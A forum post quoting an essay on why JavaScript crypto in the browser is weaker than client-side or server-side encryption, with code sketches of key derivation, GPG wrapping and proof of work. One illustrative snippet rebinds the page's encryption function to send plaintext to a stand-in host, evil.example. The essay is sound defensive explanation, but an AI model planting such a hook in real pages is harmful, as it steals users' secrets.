Security / Re: Plain text addresses
« on: June 18, 2013, 03:18 am »
http://rdist.root.org/2010/11/29/final-post-on-javascript-crypto/
Quote
The talk I gave last year on common crypto flaws still seems to generate comments. The majority of the discussion is by defenders of Javascript crypto. I made JS crypto a very minor part of the talk because I thought it would be obvious why it is a bad idea. Apparently, I was wrong to underestimate the grip it seems to have on web developers.
Rather than repeat the same rebuttals over and over, this is my final post on this subject. It ends with a challenge — if you have an application where Javascript crypto is more secure than traditional implementation approaches, post it in the comments. I’ll write a post citing you and explaining how you changed my mind. But since I expect this to be my last post on the matter, read this article carefully before posting.
To illustrate the problems with JS crypto, let’s use a simplified example application: a secure note-taker. The user writes notes to themselves that they can access from multiple computers. The notes will be encrypted by a random key, which is itself encrypted with a key derived from a passphrase. There are three implementation approaches we will consider: traditional client-side app, server-side app, and Javascript crypto. We will ignore attacks that are common to all three implementations (e.g., weak passphrase, client-side keylogger) and focus on their differences.
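Concretely, that key hierarchy works like this (a minimal sketch using Node's built-in crypto module; the choice of AES-256-GCM and the PBKDF2 parameters are illustrative assumptions, not something the design above prescribes):

const crypto = require('crypto');
const passphrase = 'entered by the user';  // hypothetical input from the app

// 1. A random data key actually encrypts the notes.
const dataKey = crypto.randomBytes(32);

// 2. A key-encryption key (KEK) is derived from the passphrase.
const salt = crypto.randomBytes(16);
const kek = crypto.pbkdf2Sync(passphrase, salt, 200000, 32, 'sha256');

// 3. The data key is encrypted ("wrapped") under the KEK; only the
//    wrapped blob is stored, so the server never sees dataKey.
const iv = crypto.randomBytes(12);
const cipher = crypto.createCipheriv('aes-256-gcm', kek, iv);
const wrappedKey = Buffer.concat([cipher.update(dataKey), cipher.final()]);
const tag = cipher.getAuthTag();
// Persist { salt, iv, tag, wrappedKey } alongside the encrypted notes.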
The traditional client-side approach offers the most security. For example, you could wrap PGP in a GUI with a notes field and store the encrypted files and key on the server. A client who is using the app is secure against future compromise of the server. However, they are still at risk of buggy or trojaned code each time they download the code. If they are concerned about this kind of attack, they can store a local copy and have a cryptographer audit it before using it.
The main advantage of this approach is that PGP has been around for almost 20 years. It is well-tested and the GUI author is unlikely to make a mistake in interfacing with it (especially if using GPGME). The code is open-source and available for review.
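As a rough illustration, such a wrapper can delegate all crypto to the local gpg binary rather than implementing any itself. A minimal sketch in Node (assuming gpg is installed; the function names and file paths are hypothetical):

const { execFileSync } = require('child_process');

function encryptNote(plainPath, cipherPath, recipient) {
  // Delegate to gpg; no crypto is implemented in this process.
  execFileSync('gpg', ['--encrypt', '--recipient', recipient,
                       '--output', cipherPath, plainPath]);
}

function decryptNote(cipherPath, plainPath) {
  // gpg-agent handles the passphrase prompt, keeping it out of this app.
  execFileSync('gpg', ['--decrypt', '--output', plainPath, cipherPath]);
}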
If you don’t want to install client-side code, a less-secure approach is a server-side app accessed via a web browser. To take advantage of existing crypto code, we’ll use PGP again, but the passphrase will be sent to it over HTTPS. The server-side code en/decrypts the notes using GPGME and pipes the results to the user.
Compared to client-side code, there are a number of obvious weaknesses. The passphrase can be grabbed from the memory of the webserver process each time it is entered. The PGP code can be trojaned, possibly in a subtle way. The server’s /dev/urandom can be biased, weakening any keys generated there.
The most important difference from a client-side attack is that it takes effect immediately. An attacker who trojans a client app has to wait until users download and start using it. They can copy the ciphertext from the server, but it isn’t accessible until someone runs their trojan, exposing their passphrase or key. However, a server-side trojan takes effect immediately and all users who access their notes during this time period are compromised.
Another difference is that the password is exposed to a longer chain of software. With a client-side app, the passphrase is entered into the GUI app and passed over local IPC to PGP. It can be wiped from RAM after use, protected from being swapped to disk via mlock(), and generally remains under the user’s control. With the server-side app, it is entered into a web browser (which can cache it), sent over HTTPS (which involves trusting hundreds of CAs and a complex software stack), hits a webserver, and is finally passed over local IPC to PGP. A compromise of any component of that chain exposes the password.
The last difference is that the user cannot audit the server to see if an attack has occurred. With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited. With a transport-level attack (e.g., sslstrip), there is nothing to audit after the fact.
The final implementation approach is Javascript crypto. The trust model is similar to server-side crypto except the code executes in the user’s browser instead of on the server. For our note-taker app, the browser would receive a JS crypto library over HTTPS. The first time it is used, it generates the user’s encryption key and encrypts it with the passphrase (say, derived via PBKDF2). This encrypted key is persisted on the server. The notes files are en/decrypted by the JS code before being sent to the server.
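For concreteness, that first-use flow would look something like the following in today's WebCrypto API (which postdates this article; at the time, JS libraries had to implement PBKDF2 and AES themselves, which is exactly the problem):

async function setupKeys(passphrase) {
  const enc = new TextEncoder();
  const salt = crypto.getRandomValues(new Uint8Array(16));

  // Derive a key-encryption key from the passphrase via PBKDF2.
  const baseKey = await crypto.subtle.importKey(
    'raw', enc.encode(passphrase), 'PBKDF2', false, ['deriveKey']);
  const kek = await crypto.subtle.deriveKey(
    { name: 'PBKDF2', salt, iterations: 200000, hash: 'SHA-256' },
    baseKey, { name: 'AES-GCM', length: 256 }, false, ['wrapKey']);

  // Generate the user's encryption key and wrap it with the KEK.
  const noteKey = await crypto.subtle.generateKey(
    { name: 'AES-GCM', length: 256 }, true, ['encrypt', 'decrypt']);
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const wrapped = await crypto.subtle.wrapKey(
    'raw', noteKey, kek, { name: 'AES-GCM', iv });

  return { salt, iv, wrapped };  // this is what gets persisted on the server
}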
Javascript crypto has all the same disadvantages as server-side crypto, plus more. A slightly modified version of all the server-side attacks still works. Instead of trojaning the server app, an attacker can trojan the JS that is sent to the user. Any changes to the code immediately take effect for all active users. There’s the same long chain of software having access to critical data (JS code and the password processed by it).
So what additional problems make JS crypto worse than the server-side approach?
Numerous libraries not maintained by cryptographers — With a little searching, I found: clipperz, etherhack, Titaniumcore, Dojo, crypto-js, jsSHA, jscryptolib, pidCrypt, van Everdingen’s library, and Movable Type’s AES. With one exception, none of these is written or maintained by cryptographers. That exception is Stanford SJCL, although it was written by grad students 6 months ago, so it’s too soon to tell how actively it will be tested and maintained.
New code, not properly reviewed, and no clear “best practices” for implementers — the oldest library I can find is 2 years old. Major platform-level questions still need to be resolved by even the better ones.
Low-level primitives only — a grab bag of AES, Serpent, RC4, and Caesar ciphers (yes, in the same library). No high-level operations like those GPGME provides. Now everyone can (and has to) be a crypto protocol designer.
Browser is a low-assurance environment — the same-origin policy is not a replacement for ACLs, privilege separation, memory protection, mlock(), etc. The JS DOM allows arbitrary eval on each element, and the language allows rebinding of most operations (too much flexibility for crypto).
Poor crypto support — JS has no secure PRNG such as /dev/urandom (see the sketch after this list), and side-channel resistance is much more difficult, if not impossible.
Too many platforms — IE, Firefox, Netscape, Opera, WebKit, Konqueror, and all versions of each. Crypto code tends to fail catastrophically in the face of platform bugs.
Auditability — each user is served a potentially differing copy of the code. Old code may be running due to browser cache issues. Impossible for server maintainers to audit clients.
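On the PRNG point above: Math.random() was effectively all a script had when this was written, and it is predictable. A minimal illustration (crypto.getRandomValues reached browsers later and is the modern fix):

// Math.random() is designed for speed, not secrecy; its internal state
// can be recovered from outputs, so it must never generate keys or IVs.
function badKeyByte() {
  return Math.floor(Math.random() * 256);  // guessable
}

// crypto.getRandomValues (added to browsers after this article) draws
// from the OS CSPRNG, the in-browser analogue of /dev/urandom.
function goodKeyBytes(n) {
  return crypto.getRandomValues(new Uint8Array(n));
}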
JS crypto is not even better for client-side auditability. Since JS is quite lenient in allowing page elements to rebind DOM nodes, even “View Source” does not reveal the actual code running in the browser. You’re only as secure as the worst script run from a given page or any other pages it allows via document.domain.
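To make the rebinding problem concrete, any script that runs on the page can silently replace the crypto code out from under the user (a contrived sketch; encryptNote is a hypothetical name for the page's crypto entry point):

// Any script on the page can wrap and replace the crypto entry point
// after it loads; "View Source" still shows the original library.
const realEncrypt = window.encryptNote;
window.encryptNote = function (plaintext, key) {
  // Exfiltrate first, then delegate so the app keeps working normally.
  new Image().src = 'https://evil.example/steal?d=' +
                    encodeURIComponent(plaintext);
  return realEncrypt(plaintext, key);
};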
I have only heard of one application of JS crypto that made sense, but it wasn’t from a security perspective. A web firm processes credit card numbers. For cost reasons, they wanted to avoid PCI audits of their webservers, but PCI required any server that handled plaintext credit card numbers to be audited. So, their webservers send a JS crypto app to the browser client to encrypt the credit card number with an RSA public key. The corresponding private key is accessible only to the backend database. So based on the wording of PCI, only the database server requires an audit.
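The browser side of that scheme is roughly the following (a sketch using WebCrypto's RSA-OAEP for illustration; the firm in question shipped its own RSA implementation, and the function name is hypothetical):

// Encrypt the card number in the browser under the database server's
// RSA public key, so the webserver only ever relays ciphertext.
async function encryptCardNumber(cardNumber, publicKeySpki) {
  const pubKey = await crypto.subtle.importKey(
    'spki', publicKeySpki, { name: 'RSA-OAEP', hash: 'SHA-256' },
    false, ['encrypt']);
  // Only the backend database holds the matching private key.
  return crypto.subtle.encrypt(
    { name: 'RSA-OAEP' }, pubKey,
    new TextEncoder().encode(cardNumber));
}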
Of course, this is a ludicrous argument from a security perspective. The webserver is a critical part of the chain of trust in protecting the credit card numbers. There are many subtle ways to trojan RSA encryption code to disclose the plaintext. To detect trojans, the web firm has a client machine that repeatedly downloads and checksums the JS code from each webserver. But an attacker can serve the original JS to that machine while sending trojaned code to other users.
While I agree this is a clever way to avoid PCI audits, it does not increase actual security in any way. It is still subject to the above drawbacks of JS crypto.
If you’ve read this article and still think JS crypto has security advantages over server-side crypto for some particular application, describe it in a comment below. But the burden of proof is on you to explain why the above list of drawbacks is addressed or not relevant to your system. Until then, I am certain JS crypto does not make security sense.
Just because something can be done doesn’t mean it should be.
Epilogue
Auditability of client-side Javascript
I had overstated the auditability of JS in the browser environment by saying the code was accessible via “View Source”. It turns out the browser environment is even more malleable than I first thought. There is no user-accessible menu that tells what code is actually executing on a given page since DOM events can cause rebinding of page elements, including your crypto code. Thanks to Thomas Ptacek for pointing this out. I updated the corresponding paragraph above.
JS libraries such as jQuery, Prototype, and YUI all have APIs for loading additional page elements, which can be HTML or JS. These elements can rebind DOM nodes, meaning each AJAX query can result in the code of a page changing, not just the data displayed. The APIs don’t make a special effort to filter out page elements, and instead trust that you know what you’re doing.
The same origin policy is the only protection against this modification. However, this policy is applied at the page level, not script level. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.
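Concretely (a contrived sketch; encryptNote is the same hypothetical entry point as above):

// One careless script widens the origin for the entire page,
// crypto code included. Running on https://www.example.net/notes:
document.domain = 'example.net';   // set by, say, an analytics script

// Any framed page on ads.example.net that also executes
// document.domain = 'example.net' can now script this page, e.g.:
//
//   parent.encryptNote = trojanedVersion;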
Brendan Eich made an informative comment on how document.domain is not the worst issue; the real problem is the lack of privilege separation for cross-site scripts:
Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src="evil.ads.com">. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if www.example.net HTML loads them, they’re #include’d into www.example.net’s origin (whether it has been modified by document.domain or not).
In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would. This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.
“Proof of work” systems
Daniel Franke suggested one potentially-useful application for JS crypto: “proof of work” systems. These systems require the client to compute some difficult function to increase the effort required to send spam, cause denial of service, or bruteforce passwords. While I agree this application would not be subject to the security flaws listed in this article, it would have other problems.
Javascript is many times slower than native code, and the gap is even larger for crypto functions than for general computation. This means the advantage an attacker gains by using native C plus a GPU will likely far outstrip any slowness legitimate users will accept. If the performance ratio between attacker and legitimate users is too great, Javascript can’t be used for this purpose.
He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on, or only for guesses with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, they can parallelize guesses across multiple users, depending on what the server uses for rate-limiting. One problem with the second is that it adds a round-trip where the server has to see the length of the attacker’s guess before selecting a difficulty for the proof-of-work function. In general, it’s better to select a one-size-fits-all parameter than to try to dynamically scale.
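For reference, the work function itself is simple; here is a minimal hashcash-style sketch using WebCrypto's SHA-256 (the API postdates this article, and the byte-level difficulty parameter is an illustrative choice):

// Find a nonce such that SHA-256(challenge + ":" + nonce) begins with
// `difficulty` zero bytes. The server verifies with a single hash.
async function proveWork(challenge, difficulty) {
  const enc = new TextEncoder();
  for (let nonce = 0; ; nonce++) {
    const digest = new Uint8Array(await crypto.subtle.digest(
      'SHA-256', enc.encode(challenge + ':' + nonce)));
    if (digest.subarray(0, difficulty).every(b => b === 0)) {
      return nonce;
    }
  }
}

An attacker can run the same search in native code with GPU assistance many times faster, which is exactly the performance-ratio problem described above.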
Browser plugin can checksum JS crypto code
This idea helps my argument, not hurts it. If you can deploy a custom plugin to clients, why not run the crypto there? If it can access the host environment, it has a real PRNG, crypto library (Mozilla NSS or Microsoft CryptoAPI), etc. Because of Javascript’s dynamism, no one knows a secure way to verify signatures on all page elements and DOM updates, so a checksumming plugin would not live up to its promise.